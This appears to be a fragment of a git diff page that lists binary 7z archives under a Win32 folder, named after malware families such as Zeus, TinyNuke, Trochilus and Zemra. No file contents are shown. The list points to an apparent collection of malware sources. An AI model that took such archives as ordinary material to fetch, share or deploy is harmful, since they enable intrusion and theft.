Normal file
Binary file not shown.
BIN
Win32/Win32.Sd.7z
Normal file
BIN
Win32/Win32.Sd.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Sdx.7z
Normal file
BIN
Win32/Win32.Sdx.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Shadow.7z
Normal file
BIN
Win32/Win32.Shadow.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Shadow.a.7z
Normal file
BIN
Win32/Win32.Shadow.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Shadow.b.7z
Normal file
BIN
Win32/Win32.Shadow.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.ShellbotFTP.7z
Normal file
BIN
Win32/Win32.ShellbotFTP.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.SkonkModBot.a.7z
Normal file
BIN
Win32/Win32.SkonkModBot.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Skuz.7z
Normal file
BIN
Win32/Win32.Skuz.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Small.7z
Normal file
BIN
Win32/Win32.Small.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Spaz.b.7z
Normal file
BIN
Win32/Win32.Spaz.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Steam.7z
Normal file
BIN
Win32/Win32.Steam.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Stolich.7z
Normal file
BIN
Win32/Win32.Stolich.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Sv.7z
Normal file
BIN
Win32/Win32.Sv.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Tank.7z
Normal file
BIN
Win32/Win32.Tank.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.TinyNuke.7z
Normal file
BIN
Win32/Win32.TinyNuke.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Trochilus.7z
Normal file
BIN
Win32/Win32.Trochilus.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Tsgh.7z
Normal file
BIN
Win32/Win32.Tsgh.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Volk.7z
Normal file
BIN
Win32/Win32.Volk.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Wisdom.c.7z
Normal file
BIN
Win32/Win32.Wisdom.c.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Woodworm.7z
Normal file
BIN
Win32/Win32.Woodworm.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Ya.7z
Normal file
BIN
Win32/Win32.Ya.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Zemra.7z
Normal file
BIN
Win32/Win32.Zemra.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Zero.7z
Normal file
BIN
Win32/Win32.Zero.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Zeus.a.7z
Normal file
BIN
Win32/Win32.Zeus.a.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.Zeus.b.7z
Normal file
BIN
Win32/Win32.Zeus.b.7z
Normal file
Binary file not shown.
BIN
Win32/Win32.irBot.7z
Normal file
BIN
Win32/Win32.irBot.7z
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user